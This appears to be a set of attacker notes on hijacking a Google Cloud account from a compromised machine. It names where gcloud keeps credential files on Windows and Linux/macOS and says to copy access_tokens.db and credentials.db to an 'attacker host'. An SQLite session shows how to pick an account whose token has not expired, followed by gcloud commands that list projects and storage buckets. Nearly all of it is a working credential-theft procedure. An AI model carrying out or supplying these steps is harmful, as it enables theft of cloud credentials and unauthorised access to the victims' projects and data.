https://github.com/orcasecurity/orca-toolbox/tree/main/GCP-Storage-Explorer
https://github.com/orcasecurity/orca-toolbox/tree/main/GCP-Lateral-Movement-Detector
https://hub.steampipe.io/mods/turbot/gcp_compliance
Windows:
C:\\Users\\[Username]\\AppData\\Roaming\\gcloud
Linux / MacOS :
~/.config/gcloud/
~/.config/gcloud/application_default_credentials.jsongcloud auth login (or gcloud auth activate-service-account) appends an entry in the credentials.db database. copy access_tokens.db and credentials.db into attacker host.Once copied
gcloud auth list
gcloud config set account {account name}
gcloud projects list
Multiple access tokens
If you run into user who has multiple account_ids in the database, you would want to pick the account for which access token has not expired. You can use SQLite queries shown below to find out account token that has not expired. (copied from https://desi-jarvis.medium.com/compromised-endpoint-to-compromised-gcp-gone-in-60-seconds-3229cc185863 )
iron@ubuntu:~/.config/gcloud$ sqlite3 access_tokens.db
SQLite version 3.31.1 2020-01-27 19:55:54
Enter ".help" for usage hints.
sqlite> .tables
access_tokens
sqlite> select account_id,token_expiry from access_tokens;
fe247b280bf225a********3c4a628788c9afc|2022-04-27 12:02:02.923763
[email protected]|2022-04-28 09:20:00.965168
sqlite> .quit
gcloud asset search-all-resources --asset-types='storage.googleapis.com/Bucket'